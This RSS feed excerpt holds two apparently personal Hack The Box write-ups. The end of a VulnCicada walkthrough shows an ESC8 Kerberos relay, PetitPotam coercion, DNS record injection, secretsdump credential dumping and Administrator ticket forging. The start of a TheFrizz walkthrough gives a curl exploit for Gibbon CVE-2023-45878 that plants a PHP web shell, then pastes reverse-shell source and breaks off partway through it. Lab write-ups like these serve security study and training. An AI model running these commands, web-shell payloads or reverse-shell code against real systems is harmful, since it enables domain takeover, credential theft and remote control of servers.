| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/
| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e
| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0
| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY
| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR
| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi
| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Issuer: commonName=DC-JPQ225.cicada.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-09T08:36:14
| Not valid after:  2025-10-09T08:36:14
| MD5:   f13b:3481:00fe:742d:b289:2a44:9aea:763c
| SHA-1: ac61:95c8:b55d:0e99:a594:56f4:48c4:e7d1:6999:96b3
| -----BEGIN CERTIFICATE-----
| MIIC6jCCAdKgAwIBAgIQNCY/0xacrp1Cgph0o7/EVDANBgkqhkiG9w0BAQsFADAe
| MRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMB4XDTI1MDQwOTA4MzYxNFoX
| DTI1MTAwOTA4MzYxNFowHjEcMBoGA1UEAxMTREMtSlBRMjI1LmNpY2FkYS52bDCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMD1KYuFyCTatOninwC0jOUf
| XKXX5gBEBj4kxS+d9yP56mMrY/KrEA+NScVoPiX3+1nHwxAaTMt5w87MdzQMKuuD
| iVuRkGfXjLAyZr5UPksxd7oBqg0RfJItYKygORbvrSJBiyjSZEStPdo4iRF1uT5+
| 7BO1aOotkssJuomFKN5xXcqs2RYw2HldZZEy5jWpn6404R5dKNIMXGPl1sklA7zZ
| RASYBXC9hMz8hvcMdeke8NDYWXg/e2GLY83gbm3M6QZ//nMILaLVCUWaGltqv69f
| LX08oXQ6DFqbSpHfQwjk+CK3XRQThz60SBY264m+DnovRpFPmxA4i8oe0T1/QAkC
| AwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqG
| SIb3DQEBCwUAA4IBAQCna6lg9KzBWoGwmyEv5l1v9E/nEdDH4fJo6FYsTafgYZiA
| FRxJqz5g/swGjnCCVUfl6Rjblm2jOjrlLk7JNLyeZ5lYObOwEljgm2u4YVvLXb99
| 9Q+ThsxgdEOv4BmD0KaWrBVq0Y38gx2Xe+CMeCpDLhsjAl0lIYRFAHZ2NxLUZd7j
| K0+G0Q60mwUV512n7VtzL7B04lpo10rXNGPAyfDw6m14w64T0H67V69bDr1LO876
| 3VFOADcaMBF4RE3UoPrXimKw/XA9dE/c9y4CdWAcN1gUFwkhoW3NYKMWiHgSOZ41
| oMl1GGfQyFXyXXLfM+F3t/Kzb/oTJKZVHMUGA/cZ
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-06T18:30:43+00:00; +3s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60737/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
61070/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
61153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
62775/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/6%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68BC7DEF%P=x86_64-pc-linux-gnu)
SEQ(SP=100%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=A)
SEQ(SP=101%GCD=1%ISR=10E%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.005 days (since Sat Sep  6 19:24:00 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 3811/tcp): CLEAN (Timeout)
|   Check 2 (port 50031/tcp): CLEAN (Timeout)
|   Check 3 (port 7565/udp): CLEAN (Timeout)
|   Check 4 (port 58555/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-06T18:30:04
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   51.07 ms 10.10.14.1 (10.10.14.1)
2   52.29 ms 10.129.132.149 (10.129.132.149)

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep  6 19:31:11 2025 -- 1 IP address (1 host up) scanned in 180.65 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Analysis of Scan Results&lt;/h2&gt;
&lt;p&gt;The Nmap scan revealed this is a Windows Domain Controller with several critical services exposed. The most interesting findings include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 2049 (NFS)&lt;/strong&gt;: Network File System - often misconfigured in enterprise environments&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ports 389/636 (LDAP/LDAPS)&lt;/strong&gt;: Active Directory services&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Port 88 (Kerberos)&lt;/strong&gt;: Domain authentication&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Port 445 (SMB)&lt;/strong&gt;: File sharing protocol&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The SSL certificate revealed the domain name &lt;code&gt;cicada.vl&lt;/code&gt; and hostname &lt;code&gt;DC-JPQ225.cicada.vl&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Updating Hosts File&lt;/h2&gt;
&lt;p&gt;To properly interact with the Active Directory environment, I added the domain information to my local hosts file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ echo -e &quot;10.129.234.48\tDC-JPQ225.cicada.vl\tcicada.vl\tDC-JPQ225&quot; | sudo tee -a /etc/hosts
10.129.234.48	DC-JPQ225.cicada.vl	cicada.vl	DC-JPQ225
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This ensures proper name resolution for Kerberos authentication and other domain-specific operations.&lt;/p&gt;
&lt;h2&gt;NFS Enumeration&lt;/h2&gt;
&lt;p&gt;Since I discovered NFS running on port 2049, I decided to enumerate available exports. NFS is often misconfigured and can expose sensitive data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ showmount -e 10.129.234.48
Export list for 10.129.234.48:
/profiles (everyone)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;/profiles&lt;/code&gt; directory was exported with &quot;everyone&quot; permissions which is a significant security misconfiguration.&lt;/p&gt;
&lt;h2&gt;Mounting the NFS Share&lt;/h2&gt;
&lt;p&gt;Since the NFS share was accessible to everyone, I mounted it locally to examine its contents:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ sudo mkdir /mnt/profiles &amp;amp;&amp;amp; sudo mount -t nfs 10.129.234.48:/profiles /mnt/profiles -o nolock
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;└─$ ls /mnt/profiles
Administrator  Daniel.Marshall  Debra.Wright  Jane.Carter  Jordan.Francis  Joyce.Andrews  Katie.Ward  Megan.Simpson  Richard.Gibbons  Rosie.Powell  Shirley.West
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found multiple user profiles, including the high-privilege &lt;code&gt;Administrator&lt;/code&gt; account and several standard user accounts.&lt;/p&gt;
&lt;h2&gt;Enumerating User Profiles&lt;/h2&gt;
&lt;p&gt;While exploring the mounted folder, I discovered that the Administrator and Rosie.Powell folders contained image files each:
&lt;img src=&quot;images/image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Discovering Credentials&lt;/h2&gt;
&lt;p&gt;I opened both images and found that the image named &lt;code&gt;marketing.png&lt;/code&gt; in Rosie.Powell&apos;s folder contained a note with &quot;Cicada123&quot; - which looked like a potential password!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-1.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Credential Validation&lt;/h2&gt;
&lt;p&gt;I decided to test if &quot;Cicada123&quot; could be the password for Rosie.Powell using NetExec:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-2.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The results showed that NTLM was disabled on this domain controller. This is actually a security best practice, but it meant I needed to use Kerberos authentication instead by adding the &lt;code&gt;-k&lt;/code&gt; flag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-3.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The authentication was successful, confirming that I had valid domain credentials for the user Rosie.Powell. This gave me my initial foothold in the Active Directory environment.&lt;/p&gt;
&lt;h2&gt;Share Enumeration&lt;/h2&gt;
&lt;p&gt;Now that I had valid credentials, I enumerated the available shares using the Rosie.Powell account and discovered that it had READ access to the CertEnroll share, which is an Active Directory Certificate Services (ADCS) share:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-4.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;ADCS environments often contain vulnerabilities that can be exploited for privilege escalation.&lt;/p&gt;
&lt;h2&gt;Certificate Services Enumeration&lt;/h2&gt;
&lt;p&gt;With access to the Certificate Services share, I used Certipy to enumerate enabled and vulnerable certificates using the Rosie.Powell account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;certipy-ad find -u &quot;Rosie.Powell@cicada.vl&quot; -p &quot;Cicada123&quot; -k  -dc-ip 10.129.234.48 -dc-host DC-JPQ225.cicada.vl  -ns 10.129.234.48 -enabled -vulnerable -stdout
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] KRB5CCNAME environment variable not set
[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for &apos;cicada-DC-JPQ225-CA&apos; via RRP
[*] Successfully retrieved CA configuration for &apos;cicada-DC-JPQ225-CA&apos;
[*] Checking web enrollment for CA &apos;cicada-DC-JPQ225-CA&apos; @ &apos;DC-JPQ225.cicada.vl&apos;
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 1459CFA9F5752BB6494FFAE4866344A9
    Certificate Validity Start          : 2025-09-08 22:25:32+00:00
    Certificate Validity End            : 2525-09-08 22:35:32+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled over HTTP.
Certificate Templates                   : [!] Could not find any certificate templates
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Identifying ESC8 Vulnerability&lt;/h2&gt;
&lt;p&gt;I discovered that the Certificate Authority (CA) was vulnerable to &lt;strong&gt;ESC8&lt;/strong&gt;, which is a vulnerability related to ADCS Web Enrollment. According to research from &lt;a href=&quot;https://abrictosecurity.com/pentesting-active-directory-certificate-services-adcs-esc1-esc8/&quot;&gt;abrictosecurity&lt;/a&gt;, ADCS Web Enrollment deploys a web server that enables clients to request certificate templates. This web server supports NTLM authentication, making it susceptible to relay attacks.&lt;/p&gt;
&lt;p&gt;Since NTLM was disabled on this domain controller, I needed to look for Kerberos relaying attack possibilities.&lt;/p&gt;
&lt;p&gt;Researching Kerberos Relay Attacks I found an interesting article from &lt;a href=&quot;https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx.html&quot;&gt;synacktiv&lt;/a&gt; about relaying Kerberos over SMB. This technique would allow me to exploit the ESC8 vulnerability even with NTLM disabled.&lt;/p&gt;
&lt;h2&gt;Setting up DNS Poisoning&lt;/h2&gt;
&lt;p&gt;Following the Synacktiv article, I added a DNS record to prepare for the Kerberos relay attack:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ python3 dnstool.py -k -u &apos;CICADA.VL\\ROSIE.POWELL&apos; -r &apos;DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA&apos; -dns-ip 10.129.202.65  -d 10.10.15.0 --tcp  DC-JPQ225.cicada.vl --action add
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This DNS record would redirect traffic to my controlled server, enabling the relay attack.&lt;/p&gt;
&lt;h2&gt;Setting up Certificate Relay&lt;/h2&gt;
&lt;p&gt;Next, I set up a Certipy relay server targeting the HTTP web enrollment service:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad relay -target &apos;http://dc-jpq225.cicada.vl/&apos; -template DomainController
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This command set up a relay server that would capture authentication attempts and request a DomainController certificate template.&lt;/p&gt;
&lt;h2&gt;Triggering Authentication Coercion&lt;/h2&gt;
&lt;p&gt;In a separate terminal, I used NetExec with the coerce_plus module to force the domain controller to authenticate to my malicious DNS record:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-6.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The coercion was successful The PetitPotam method forced the domain controller to authenticate to my controlled server.&lt;/p&gt;
&lt;h2&gt;Capturing the Domain Controller Certificate&lt;/h2&gt;
&lt;p&gt;Back on the Certipy relay terminal, I successfully received the DomainController certificate:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-5.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now that I have the &lt;code&gt;dc-jpq225.pfx&lt;/code&gt; certificate for the Domain Controller, it will allow me to impersonate the DC and dump credentials.&lt;/p&gt;
&lt;h2&gt;Requesting TGT with Certificate&lt;/h2&gt;
&lt;p&gt;With the Domain Controller certificate in hand, I used Certipy&apos;s auth module to request a TGT (Ticket Granting Ticket) that I could use for further operations:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.202.65
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-7.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I now have a valid Kerberos ticket cache file (&lt;code&gt;dc-jpq225.ccache&lt;/code&gt;) that would allow me to authenticate as the Domain Controller.&lt;/p&gt;
&lt;h2&gt;Dumping Administrator Credentials&lt;/h2&gt;
&lt;p&gt;With the TGT in place, I used Impacket&apos;s secretsdump tool to extract the Administrator&apos;s password hash from the domain controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;KRB5CCNAME=dc-jpq225.ccache impacket-secretsdump -debug -k -no-pass \
  &apos;cicada.vl/dc-jpq225$@DC-JPQ225.cicada.vl&apos; \
  -just-dc-user administrator
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-8.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I successfully dumped the Administrator&apos;s credentials, including both NTLM and AES encryption keys.&lt;/p&gt;
&lt;h2&gt;Obtaining Administrator TGT&lt;/h2&gt;
&lt;p&gt;Using the extracted AES key, I requested a fresh TGT for the Administrator account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ impacket-getTGT -aesKey f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a CICADA.VL/Administrator

Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Administrator.ccache
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a valid Administrator TGT saved as &lt;code&gt;Administrator.ccache&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Finally, I used Impacket&apos;s psexec tool to obtain a shell on the domain controller with Administrator privileges:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-9.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;I achieved complete compromise of the VulnCicada domain controller and got the flags&lt;/p&gt;
</content:encoded></item><item><title>TheFrizz</title><link>https://dahmanisec.me/posts/thefrizz/thefrizz/</link><guid isPermaLink="true">https://dahmanisec.me/posts/thefrizz/thefrizz/</guid><description>Hack The Box Windows machine, medium difficulty</description><pubDate>Mon, 24 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;User Flag&lt;/h1&gt;
&lt;h2&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;As always we start with an Nmap scan&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.95 scan initiated Sat Mar 15 21:21:24 2025 as: /usr/lib/nmap/nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.60
Nmap scan report for 10.10.11.60 (10.10.11.60)
Host is up (0.050s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh?
| fingerprint-strings:
|   NULL:
|_    Exceeded MaxStartups
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
64081/tcp open  msrpc         Microsoft Windows RPC
64085/tcp open  msrpc         Microsoft Windows RPC
64093/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.95%I=7%D=3/15%Time=67D5EF6F%P=x86_64-pc-linux-gnu%r(NULL
SF:,16,&quot;Exceeded\x20MaxStartups\r\n&quot;);
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-16T04:22:59
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   50.73 ms 10.10.14.1 (10.10.14.1)
2   50.81 ms 10.10.11.60 (10.10.11.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 15 21:24:35 2025 -- 1 IP address (1 host up) scanned in 191.48 seconds

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I added &lt;code&gt;frizzdc.frizz.htb&lt;/code&gt;to &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo -e &quot;10.10.11.60\tfrizzdc.frizz.htb&quot; | sudo tee -a /etc/hosts
10.10.11.60	frizzdc.frizz.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then looked at &lt;code&gt;frizzdc.frizz.htb&lt;/code&gt; to check what we have
&lt;img src=&quot;1.png&quot; alt=&quot;&quot; /&gt;
It is an educational website powered by Gibbon
&lt;img src=&quot;2.png&quot; alt=&quot;&quot; /&gt;
The first thing I noticed was a notice stating that &lt;strong&gt;accounts will be unavailable for 48 hours due to Gibbon&apos;s migration to Azure AD SSO&lt;/strong&gt;. Additionally, I observed that the Gibbon version is &lt;strong&gt;25.0.00&lt;/strong&gt;. A quick googling shows that this version of Gibbon has a lot of vulnerabilities
&lt;img src=&quot;3.png&quot; alt=&quot;&quot; /&gt;
One critical issue in Gibbon version &lt;code&gt;25.0.00&lt;/code&gt; is an &lt;strong&gt;unauthenticated Arbitrary File Write vulnerability&lt;/strong&gt;. The endpoint &lt;code&gt;rubrics_visualise_saveAjax.phps&lt;/code&gt; does not require authentication, allowing an attacker to create PHP files. This, in turn, enables &lt;strong&gt;unauthenticated Remote Code Execution (RCE)&lt;/strong&gt; &lt;a href=&quot;https://herolab.usd.de/security-advisories/usd-2023-0025/&quot;&gt;CVE-2023-45878&lt;/a&gt;.
After reading the PoC, I crafted this payload to generate a PHP file that can allow me execute remote code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -X POST &quot;http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php&quot; \
-H &quot;Host: frizzdc.frizz.htb&quot; \
--data-urlencode &quot;img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K&quot; \
--data-urlencode &quot;path=shell.php&quot; \
--data-urlencode &quot;gibbonPersonID=0000000001&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And got this response &lt;code&gt;shell.php&lt;/code&gt;
&lt;img src=&quot;4.png&quot; alt=&quot;&quot; /&gt;
I&apos;m inside a webservice now, I tried to get a reverse shell using Powershell payloads from &lt;a href=&quot;revshells.com&quot;&gt;revshells&lt;/a&gt; but I failed. And then I tried to update the php code I send with the post request using curl by writing a reverse shell to the file shell.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -X POST &quot;http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php&quot; \
-H &quot;Host: frizzdc.frizz.htb&quot; \
--data-urlencode &quot;img=image/png;asdf,<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = 'powershell';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $fstat = fstat($input);
        $size = $fstat['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
